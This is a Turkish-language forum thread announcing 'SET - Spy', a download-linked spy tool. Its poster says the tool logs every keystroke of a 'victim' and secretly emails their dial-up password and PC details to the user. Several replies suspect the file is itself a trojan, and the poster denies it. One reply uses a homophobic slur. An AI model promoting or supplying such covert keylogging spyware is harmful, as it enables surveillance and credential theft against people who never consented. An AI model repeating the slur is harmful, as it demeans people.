SET - Spy [Spy Tool] Release
-
Hedef Bilgisayarda NE Varsa Yoksa Belirttiğiniz Mail Adresine Gönderir...
Download
http://www.silvereagleteam.com/download/S.E.T_Spy_v1.0.rar
Rar Password: www.silvereagleteam.com -
nası yani komple harddiski maile mi gönderiyo_? :))))))
-
Bilmediğiniz programları indirmeyin, trojanlı olabilir antiye yakalanmayan trojan fln olabilir. Adam gelmiş hemen 3 program atmış bi de bayan üye yapmış nicke bak bayan olur mu böyle.. Hemen atlamayın bence indirmeyin
-
okadrcık dildir bence cdrom,flopy fln da göderir;)
ya indirmedım ben meselada adam pardon kadın bayan işte neyse;)yeni üye dill. nese gerekmes bole bişi,deneyen belki olur sora;) -
hangi türden bilmem ama bana biraz reklam yapıo gibi geldi diilse trojanlı dosyaları yolluyo ibne
-
[ Akapella
nası yani komple harddiski maile mi gönderiyo_? :)))))) ]
Hayır harddiski değil,Kurbanın klavyeya bastığı her tuş loglanıyor ve clientteki özellikleri seçiminize göre dial up şifresi,pc bilgisi..vs gönderiyor
[ Fistandantilus
Bilmediğiniz programları indirmeyin, trojanlı olabilir antiye yakalanmayan trojan fln olabilir. Adam gelmiş hemen 3 program atmış bi de bayan üye yapmış nicke bak bayan olur mu böyle.. Hemen atlamayın bence indirmeyin ]
Kardeş isteyen indirir isteyen indirmez tamami ile size kalmış birşeydir ama programlarda her hangi bir trojan yoktur.
İsterseniz ilk önce işten anlıyan birine kontrol ettirin sonra indirin...
[ MaxDreameR
okadrcık dildir bence cdrom,flopy fln da göderir;) ya indirmedım ben meselada adam pardon kadın bayan işte neyse;)yeni üye dill. nese gerekmes bole bişi,deneyen belki olur sora;) ]
Kusura bakmayın üye olurken bayan seçmişim ve daha yeni farkına varıyorum şimdi düzelttim.
[ Akapella
hangi türden bilmem ama bana biraz reklam yapıo gibi geldi diilse trojanlı dosyaları yolluyo ibne ]
Kardeş Trojanllı değil.Daha demin dediğim gibi anlıyan bir kişi test etsin.
Laflarınada dikkat et.
Toplam Hit: 2327 Toplam Mesaj: 6